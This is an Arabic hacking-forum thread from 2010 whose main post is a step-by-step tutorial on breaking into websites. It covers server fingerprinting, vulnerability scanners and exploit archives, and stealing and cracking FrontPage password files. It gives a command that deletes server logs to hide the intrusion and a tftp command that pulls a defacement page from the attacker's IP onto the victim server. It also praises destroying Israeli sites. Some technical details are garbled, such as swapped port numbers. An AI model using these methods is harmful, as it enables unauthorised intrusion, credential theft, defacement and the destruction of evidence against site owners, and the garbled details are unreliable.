السلام عليكم و رحمة الله و بركاته
عزيزي الزائر / عزيزتي الزائرة
يرجى التكرم بتسجيل الدخول إذا كنت عضو معنا
أو التسجيل ان لم تكن عضو وترغب في الانضمام إلى أسرة منتدي
assanaje بني حبيبي
يشرفنا تسجيلك
شكــــرا
إدارة المنتـــــدى
السلام عليكم و رحمة الله و بركاته
عزيزي الزائر / عزيزتي الزائرة
يرجى التكرم بتسجيل الدخول إذا كنت عضو معنا
أو التسجيل ان لم تكن عضو وترغب في الانضمام إلى أسرة منتدي
assanaje بني حبيبي
يشرفنا تسجيلك
شكــــرا
إدارة المنتـــــدى
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.



 
الرئيسيةالرئيسية   اتصل بنا  س .و .جس .و .ج  أحدث الصورأحدث الصور  بحـثبحـث   القران فلاش   دردشة  التسجيلالتسجيل  دخولدخول  

 

 جميع طرق اختراق المواقع (رائع)

اذهب الى الأسفل 
3 مشترك
كاتب الموضوعرسالة
المشرف العام
المشرف العام
المشرف العام
المشرف العام


عدد المساهمات : 143
نقاط : 18060
السٌّمعَة : 4
محل الاقامة محل الاقامة : djemaa.yoo7.com

جميع طرق اختراق المواقع (رائع) Empty
مُساهمةموضوع: جميع طرق اختراق المواقع (رائع)   جميع طرق اختراق المواقع (رائع) I_icon_minitimeالإثنين يونيو 07, 2010 8:52 pm

(اختراق المواقع)

اول شيئ عليك ان تعلم:
1- لاتحسبنا المجد تمرا انت اكلهو.... لن تبلغ المجد حتى تلعق الجمرا.
(يعني مو بليلة وضحاها رح تصير هكر محترف)
2- ان الهكر الحقيقي لا يستعمل برامج صنعها هكر اخر بل الذي يبتكر اشياء جديدة.

1- (اساسيات وتعاريف)
تلنت: (Telnet) - 1
و هو برنامج صغير موجود في الويندوز . أي أن باستطاعة هذا البرنامج الإتصال بالسيرفر
أوالخادم و اجراء بعض العمليات كل حسب مستواها و حالتها . يستخدمه الهاكرز
غالبا لمعرفة نظام تشغيل الموقع و السيرفر التابع له ، و للإتصال بالسيرفر
عبر بورت معين و خصوصا بورت الإف تي بي (21) للدخول الى الموقع بطريقة
خفية
لعرض ملفات الموقع و سحب ملف الباسورد او غيره من البيانات.
لاستخدام البرنامج ، اذهب الى
Start ==> Run ==> telnet
و ستظهر شاشة التلنت.
------------------------------------------------------------------------
برامج السكان: (Scanner) - 2
و هي برامج موجودة للمسح على المواقع و كشف ثغراتها إن وجدت ، فهي سريعة،
كما أنها تملك قاعدة بيانات واسعة و كبيرة تحتوي على الثغرات أو الاكسبلويت
التي يتم تطبيقها على الموقع لرؤية فيما اذا كان السيرفر يعاني من احدى هذه الثغرات أم لا . و من أمثلة
Shadow Security Scanner و Stealth و Omran Fast
هذه البرامج، برنامج
Scanner
و لهذه البرامج أنواع مختلفة ، منها التي تقوم بعمل سكان على نظام أو سيرفر
معين مثل البرامج المختصة بالسكان على سيرفرات الـ
IIS
على ثغرات السي جي اي فقط و منها برامج المسح
CGI
-----------------------------------------------------------------------
اكسبلويت: (Exploits) - 3
هي برامج تنفيذية تنفذ من خلال المتصفح . و لها عنوان
URL
، تقوم هذه الإكسبلويتات بعرض ملفات الموقع و تقوم بعضها بالدخول الى
السيرفر و التجول فيه ، كما توجد اكسبلويتات تقوم بشن هجوم على بورت معين
في السيرفر لعمل كراش له ، و هذا ما يسمى بـ
Buffer Over Flow Exploits
هناك أنواع من الإكسبلويت ، فمنها ال
CGI Exploits
CGI Bugs
Unicodes Exploits
Buffer Over Flow Exploits
PHP Exploits
DOS Exploits
والتي تقوم بعملية حجب الخدمة للسيرفر إن وجد فيها الثغرة المطلوبة لهذا الهجوم و ان لم يكن على السيرفر أي فايرول
Fire Wall
.وهناك بعض الإكسبلويتات المكتوبة بلغة السي و يكون
امتدادها (.c)
هذه الإكسبلويتات بالذات تحتاج الى كومبايلر او برنامجا لترجمتها و تحويها
الى اكسبلويت تنفيذي عادي يستخدم من خلال المتصفح ، و لتحويل
الإكسبلويت المكتوب بلغة السي هذه الى برنامجا تنفيذيا ، نحتاج إما الى
نظام التشغيل لينوكس او يونكس ، او الى اي كومبايلر يعمل ضمن نظام التشغيل
ويندوز . أشهر هذه الكومبايلرات ( المترجمات أو المحولات ) برنامج اسمه
Borland C++ Compiler
و هي تعمل تحت نظام التشغيل ويندوز كما ذكرنا سابقا.
----------------------------------------------------------------------
الجدار الناري: (FireWall) - 4
هي برامج تستعملها السيرفرات لحمايتها من الولوج الغير شرعي لنظام ملفاتها
من قبل المتطفلين هي تمثل الحماية للسيرفر طبعا ولكني أنوه بأن الفايروات
المستخدمة لحماية السيرفرات (المواقع) تختلف عن تلك التي تستخدم لحماية
الأجهزة.
----------------------------------------------------------------------
هو ملف الباسورد المظلل: (Token) - 5
(Shadowed Passwd)
والذي يكون فيه الباسورد على شكل
*
او
x
البحث عن ملف الباسورد الغير المظلل و الذي يسمى إن وجدت ملف الباسورد مظللا ، فيجب
Shadow file
تجده في
/etc/shadow
----------------------------------------------------------------------
Anonymouse) - 6
هي الوضعية الخفية و المجهولة التي تدخل فيها الى الموقع المراد
اختراقه. هناك خاصية في برامج الاف تي بي بنفس الإسم ، تستطيع ان تستعملها
في الدخول المجهول الى السيرفر و سحب الملفات منه.
----------------------------------------------------------------------
Valnerableties) - 7
أي الثغرات أو مواضع الضعف الغير محصنة أو القابلة للعطب
و التي يعاني منها السيرفر و التي قد تشكل خطرا أمنيا عليه مما يؤدي الى
استغلالها من قبل الهاكرز في مهاجمة السيرفر و اختراقه أو تدميره .
ما هي مفردها ؟
Valnerable
أي ثغرة أو بالأصح موضع الضعف والمكان الغير مؤمن بشكل سليم . و تكثر هذه
الكلمة في القوائم البريدية للمواقع المهتمة بالسيكيوريتي و أمن الشبكات و
غيرها كالقائمة البريدية الموجودة في موقع
Security Focus
أو بوق تراك او غيرها.
----------------------------------------------------------------------
: ملف الباسوورد(passwd file) - 8
هو الملف الذي يحتوي على باسورد الروت و باسوردات الأشخاص
المصرح لهم بالدخول الى السيرفر . باسورد الموقع موجود في نفس الملف طبعا.
----------------------------------------------------------------------
الجذر: (root) - 9
و هو المستخدم الجذري و الرئيسي للنظام ، له كل الصلاحيات
في التعامل مع ملفات الموقع و السيرفر من إزالة أو اضافة أو تعديل للملفات.
غالبا ما يكون باسورد الروت هو باسورد الموقع نفسه في المواقع التي تعمل ضمن
نظام التشغيل لينوكس او يونكس و سولاري و فري بي اس دي و غيرها .
----------------------------------------------------------------------
السيرفر: (Server) - 10
هو الجهاز المستضيف للموقع ، اذ أن كل ملفات الموقع توضع فيه
فهو جهاز كمبيوتر عاد كغيره من الأجهزة لكنه ذو امكانيات عالية ككبر حجم القرص
الصلب و سرعته الهائلة ، و هو متصل بالإنترنت 24 ساعة ، و هذا هو سبب كون
المواقع شغالة 24 على الإنترنت . قد يملك و يستضيف السيرفر أكثر من موقع
واحد، و هذا يعتمد من سيرفر لآخر و من شركة لأخرى. ضربة الهاكرز طبعا هي اختراق
السيرفر الذي يملك الكثير من المواقع ، فيسهل حينها اختراق جميع المواقع التي
تندرج تحته مما يؤدي إما الى تدميرها أو العبث في ملفاتها أو تشويه واجهتها أو
سرقة بياناتها و تدميرها أو مسحها من النت تماما ، و هذا ما يحدث للمواقع
الإسرائيلية و بكثرة و لله الحمد .( جزاكم الله خيرا أيها المجاهدون)
-----------------------------------------------------------------------
بوفر أوفر فلو: ( Buffer over Flow ) - 11
وهي نوع من أنواع الاكسبلويتات التي تستعمل لشن هجوم الطفح على نقطة معينة
من السيرفر مثل الهجوم على بورت الإف تي بي أو غيره لأجل اضعاف اتصال
السيرفر و فصل اتصاله بهذا بهذا البورت و لالغاء الرقعة الموجودة بها كي
يتم استغلالها مجددا - بعد عمل الكراش لها طبعا - يتم استغلالها في معاودة
الإتصال لها و بسهولة و دون وجود أي رقع او حواجز و سحب البيانات منها . و
هي شبيهة نوعا ما بعملية حجب الخدمة اذ أنها تقوم بعملية اوفر لود على جزء
مركز من السيرفر .
-----------------------------------------------------------------------
كثير من الهكرز يحبون ان يطلقوا على كل من ال - 12
pc , servers , supercomputers
كلمه
BOX
-----------------------------------------------------------------------
13- النظام الذي سوف نقوم باختراقه يحتوي عاده على العديد من اليوزرز ..بالاضافه لليوزرز
تسطيع ان تطلق على الرئيس هناك كلمه
superuser
وهو يكون روت
وهو الادمين او المدير على النظام....
-----------------------------------------------------------------------
14- ماهو الشيل اكاونت: هو عباره عن خدمه حيث يمكنك من خلالها التحكم في جهاز من بعيد و هذا الجهاز عليه نظام اليونيكس.
-----------------------------------------------------------------------
15- احنا اخترقنا موقع لازم نمسح خطواتنا علشان لايعرفنا صاحب الموقع ويئذينا كيف؟
/c+del+c:/winnt/system32/logfiles/*.log
نكتب هذا الامر بالدوس
او نروح السي وبعدين فايل ويندوز بعدين فايل
system32
بعدين
امسح ملف اسمة
*
وامتدادة
(مع الشكر للاخ مش مش مان)log
-----------------------------------------------------------------------
16- الحين احنا اخترقنا موقع ونبي نغير صفحة البداية ونكتب تم اختراق هذا الموقع كيف؟
تقدر تغير الصفحه الرئيسه لما يكون الباسورد حق الموقع عندك بعدين تدخل عليه بعدين تروح لملف اسموا
index
افتحوا او الغيه و حط ملف بنفس الاسم بالأشياء الي تبيها ببرنامج اسمه
WS_FTP PRO
والبرنامج سهل اللي يبي شرح يقولي
(مع الشكر للاخ مش مش مان)
------------------------------------------------------------------------------------------------
17- ( برامج للبحث عن ثغرات وأنظمة المواقع وبعض معلوماتها )
هذي من أفضل برامج البحث عن الثغرات وانشاء الله تعجبكم انت بس ادخل وتلقى:
============================================
1- N-Stealth
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
أداة رائعة وقوية وتتميز باكتشاف نظام الموقع وثغراته
**************************************************
*************
2- Shadow Security Scanner
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
برنامج ذو شهرة عالية وفعالية كبيرة في فحص المواقع من المنافذ والثغرات
**************************************************
*************
3- Omran Scanner
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
برنامج عربي من برمجة الأخ/عمران الغامدي ولابأس به لاكتشاف الثغرات ويحتوي على ملفات للبحث مثل
Linux-Unix-NT
**************************************************
*************
4- CGI Scanner
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
مختص في البحث عن ثغرات
cgi
وهو الأفضل في عمل ذلك
**************************************************
*************
5- UniScan
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
كالسابق ولكن هذا البرنامج خاص بفحص ثغرات UNicode
**************************************************
*************
6- Retina Apache [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
للبحث عن الأجهزة والمواقع التي تملك ثغرة
Apache
**************************************************
*************
7- SamiScaN
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
أداة رائعة وعربية يعرض نظام التشغيل والملقم والعنوان الحقيقي ويحتوي على أربع ملفات لايجادالثغرات
cfusion.txt, cgi.txt, cgi2.txt, NT.txt
**************************************************
*************
8- voideye
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
نسمع عنه كثيرا وهو لأنه أقدم برنامج في البحث عن الثغرات يملك واجهة جميلة ولكني لاأفضله على
sss
**************************************************
*************
الملقمات اشهرها اثنين: - 18
IIS:
من مايكروسوفت وهذه مليانة ثغرات. (ومواقع قليل مقفلة ثغراتها).
apache:
من مجموعة مبرمجين متوزعين في انحاء العالم واختراقها شبه صعب.
-----------------------------------------------------------------
19- اول خطوة في الاختراق هي اخذ المعلومات:
يعني نعرف الموقع شنو الملقم اللي شغال عليه والنظام والخدمات اللي يدعمها.
طيب الحين عندنا موقع وشلون نعرف نظام التشغيل والملقم والخدمات والمعلومات كلها عندك الموقع
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
ملاحظة: نكتب الموقع من غير
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
ولا
/
اللي بالاخير
او نستخدم التلنت.
1 - مثال على ملقمات اي اي اس:
راح يطلع لنا التالي
The site [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] is running Microsoft-IIS/5.0 on Windows 2000
طيب الحين عرفنا معلومتين مهمتين
اول شيء انه شغال على الملقم
IIS5.0
ثاني شيء شغال على نظام ويندوز 2000
اول شيء نجرب ثغرات
IIS5.0
عليه
إذا مانفع شيء نشوف ثغرات نظام ويندوز 2000
طيب الحين فيه حاجة اسمها يوني كود هذه تخترق فيها عن طريق المتصفح وماتمشي إلا مع ملقمات
IIS
وهي عبارة عن عناوين طويلة تحطها بعد عنوان الموقع.
طيب لنفرض انه ماطلع فيها ثغرات؟
نشوف محتويات الموقع نفسه
نشوف إن كان عنده سجل زوار او منتدى او ....
2 - مثال على ملقمات اباتشي:
ناخذ مثال موقع ارانك
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
لو حللناه بالنيت كرافت راح نشوف النتيجة التالية:
The site [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
is running Apache/1.3.20 (Unix) mod_gzip/1.3.19.1a mod_perl/1.26
mod_bwlimited/0.8 PHP/4.0.6 mod_log_bytes/0.3 FrontPage/5.0.2.2510
mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux
هنا يهمنا ثلاث اشياء:-
1- الملقم وهو:
apache 1.3.20
2- ودعم فرونت بيج وهذه مليانة ثغرات
FrontPage/5.0.2.2510
3- النظام وهو
Linux
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
الملقم:
اول شيء اباتشي من الملقمات الصعبة الإختراق إلا بعض الإصدارات منها فنحط هذه على جنب.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
دعم الفرونت بيج زي ماقلنا الفرونت بيج مليان ثغرات وثغراته قوية وكثيرة تقريبا منها مجلد
_vti_pvt
و
_private
هذه اللي نحتاجها غيره مامنه فايدة داخل المجلدين راح نلاقي اربع ملفات مهمة وهي
service.pwd
و
users.pwd
و
authors.pwd
و
adminstators.pwd
ويعتبر هذا اخطر ملف طيب لو قدرنا ننزل واحد من الملفات هذه (ملاحظة
الثغرة هذه موجودة ب 70% من المواقع الموجودة عالنت) لو نزلناها نفتحها
بالمفكرة ونلاقي السطر هذا على سبيل المثال
goodyco:CalXS8USl4TGM
وهذا من موقع قودي
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
طيب الحين
goodyco
اليوزر والباسورد مشفر واللي هو
CalXS8USl4TGM
وشلون ينفك؟
ينفك ببرنامج اسمه
john the repaier
( شرح الاستخدام موجود في اخر موضوع في هذا المجلد)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
طيب نروح للفقرة الثالثة واللي هي النظام زي ماشفنا النظام هو لينكس لكن
لينكس ايش؟ فيه ريد هات و ماندريك وفيه منه إصدارت كثير وثغرات اكثر لكن
هنا راح تواجهك مشكلتين
اول شيء معرفة النظام تقدر تطلعه من ابدا وتشغيل ال
telnet
واكتب عنوان الموقع يطلع لك النظام فوق نوعه وإصدارته المشكلة الثانية لازم يكون عندك لينكس اصلا علشان ثغراته بلغة ال
c
وهذه ماتشتغل إلا عاللينكس فقط.
----------------------------------------------------------------------
20- (مواقع تطلعلك ثغرات الانظمة والويندوز والمنتديات وووو....)
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الموقع هذا خطير جداً جداً تروح ل
EXPLOITS
اللي عاليسار وتختار اول اختيار هنا ثغرات جميع الانظمة من لينكس و ويندوز و و و الخ.. ومنوعة من
c
و
perl
و يوني كود.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
هذا الموقع مفيد جدا تكتب مثلا فوق بالمربع اللي عاليمين
IIS او apache
او منتدى واصدارته او اي برنامج ويطلع لك ثغراته.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
أرشيف لثغرات
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
أرشيف لثغرات
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
أرشيف لثغرات
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
أرشيف لثغرات
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
أرشيف لثغرات
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
مواقع لثغرات
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
---------------------------------------------------------------------
20- هناك انظمة وملقمات كثيرة منها:
Apache (الملقم)
IIS(الملقم)
SunOS(الملقم)
FreeBSD (My BaBe)(الملقم)
OpenBSD(الملقم)
NetBSD(الملقم)
AIX(الملقم)
IRIX(الملقم)
NetScape(الملقم)
Enterprise(الملقم)
Windows/NT/2000/xp (نظام التشغيل)
Linux(نظام الشتغيل )
-------------------------------------------------------------------
له ست مجلدات) 21- (اليونكس


خاص بالملفات الثنائيه يعني اللي تشغل النظام bin ملفات ادارة النظام ومن
ظمنها الرووت اللي هو حساب مدير النظام او passwd etc ملفات الاجهزه dev
مكتبات الربط الديناميكي اللي تساعد النظام في التشغيل lib الملفات
الموقته او غير الثابته tmp اسماء المستخدمين وكلمات السر اللي لهم حسابت
بالنظام usr

--------------------------------------------------------------------
22- (اوامر الاف تي بي)

لكي تعرف ما يحتويه الهارد ديسك Pwd لإقتحام مجلد مثال Cd black في هدا
المثال قمت بإقتحام مجلد المسمى بلاكCd لكي يتضح لك محتوى المجلد أو
الهارد ديسك Ls لكي تحمل الى سطح المكتب حق جهازك مثال Get black.exe Get
العملية العكسية ل Get يعني ان تأخد ملف من سطح المكتب حق جهازك و تضعه في
في جهاز الضحية مثال Put black.exe Put لقطع الإتصال مع الضحيةClos

يمكنك تشغيل الاف تي بي من الويندوز عن طريق :
START > RUN > ftp -n hostname
----------------------------------------------------------------------------
23- بورتات برامج:-
7 echo
21 telnet
23 ftp
25 smtp
80 http
110 POP
----------------------------------------------------------------------------
c - 24
هو برنامج سي لكنه سورس كود فقط واغلب الثغرات التي يتم كتابتها بالسي
ولاكن المشكلة انه لايمكن تشغيله تحت بيئة ويندوزفيجب ان يكون عندك
Linux او Shell Account
----------------------------------------------------------------------------
25 - ملاحظة رسائل لأخطاء ومن أشهرها الرسالة 404
Error
وهي تظهر عند طلب ملف غير موجود بالموقع وعند ظهور هذه الصفحة انظر
إلى أسفل الصفحة وقد تجد معلومات مثل إصدارة ملقم الويب وهذه معلومات غير مضرة أو خطير لكنها تفيد في عملية الاختراق.
---------------------------------------------------------------------------
26 -(كيف تحصل على شيل اكاونت مجانا)

و تنقسم الشيل اكونتس الي نوعين:
1-restricted
2-non-restricted
و الفرق بينهما ان
restricted
مدفوع القيمه و يمكنك من تنفيذ اي
command
اما ال
non restricted
فهو مجاني
و لكن مشكلته انه لا يمكنك من تنفييذ كل الاوامر! لكي تحصل علي شيل اكونت
مجانا يمكنك الحصول عليه من اي مزود شيل اكونتس علي الشبكه مثل
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
او الاتصال بمزود الخدمه و اطلب منه شيل اكونت طبعا سيسالك لماذا تريد
الشيل اكونت اجب عليه بانك تريد استخدام و التدرب علي نظام اللينكس و
اليونكس فيما بعد و هذي الاجابه كافيه لك يعطيك شيل اكونت و الشيل اكونتس
مختلفه و تتميز فيما بينها
بالتالي:
1-telnet
2-nslookup و الذي يعطيك معلومات عن المضيف
3-ftp
4-finger
4-trace route
5-dig و هذا الامر غير متاح غالبا في معظم الشيلز المجانيه
6-netstat
7-gcc و هذا كمبيلير للغه البرمجه c
8-gzip لفك ضغط الملفات
9-lynx متصفح للانترنت

------------------------------------------------------------------
تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج - 27
.TFTP
-=-=-=-=-=-=-=-=-=-=-=-=-
قم بانشاء صفحة وضع شعارك عليها واحفظها باسم
index.htm
على الـ
c:
قم بتشغيل برنامج
TFTP
:ونفذ الامر في الفقرة التالية
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:inetpubwwwrootindex. ht m
tftp.exe
وهو البرنامج اللازم لعمل الاب لوود ويجب ان يكون شغال في حالة تنفيذ الامر
"-i"
وهو بمثابة باراميترز لزوم قراء البيانات في مكتبة الملفات
1.1.1.1 رقم الايبي الخاص بك
GET
وهو الامر اللازم لطلب الملفات مابين الارسال والاستقبال
index.htm
اسم الملف بجهازك
inetpubwwwroot
اسم الدليل في السيرفر
index.htm
اسم الملف على السيرفر
-----------------------------------------------------------------
تحاول أن تدخل لوحة التحكم معظم المواقع تكون لوحة تحكمها على الشكل - 28
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
أو
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
هذا في حال كان الموقع يستخدم الـ
CPanel
وهو البرنامج الأكثر شيوعاً ..
ومن ثم تظهر لك نافذة اكتب فيها اسم المستخدمة وكلمة السر ..
وتصير في الداخل.
----------------------------------------------------------------
29- اماكن تواجد ملف باسوورد المواقع:
Sunos 5.0 etc/shadow او etc/passwd
Linux etc/shadow او etc/passwd
BSD4.3 –RENO etc/master.passwd
AIX etc/security/passwd
NT ويندوز scripts/passwd
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://djemaa.yoo7.com
moustafahakda
عظو عادي
عظو عادي



عدد المساهمات : 9
نقاط : 15128
السٌّمعَة : 15
العمر : 36
محل الاقامة محل الاقامة : djemaa.yoo7.com

جميع طرق اختراق المواقع (رائع) Empty
مُساهمةموضوع: رد: جميع طرق اختراق المواقع (رائع)   جميع طرق اختراق المواقع (رائع) I_icon_minitimeالخميس يونيو 17, 2010 11:44 pm

ماشي ساهلة ياخويا محمد
الرجوع الى أعلى الصفحة اذهب الى الأسفل
hacker
المشرف
المشرف
hacker


عدد المساهمات : 22
نقاط : 15368
السٌّمعَة : 4

جميع طرق اختراق المواقع (رائع) Empty
مُساهمةموضوع: رد: جميع طرق اختراق المواقع (رائع)   جميع طرق اختراق المواقع (رائع) I_icon_minitimeالأحد يوليو 04, 2010 12:16 am

واحد ماخلق امعلم ياخويا [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] عندما تضع شيئ بين عينيك فلابد ان تصل اليه ثق بنفسك فقط بالتوفيق
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
جميع طرق اختراق المواقع (رائع)
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» طريقة اختراق المواقع المجانية...
» أساسيات إختراق المواقع....."للمبتدئين"
» أنواع وخصائص استضافة المواقع العالمية وحصرياً من شركة كيوبالي
» منتدي رائع
» منتدي جد جد رائع

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
 :: منتدي برامج الكبيوتر والهاتف والمحادثة/الهكر :: الهكر/طرق اختراق المواقع/حماية-
انتقل الى: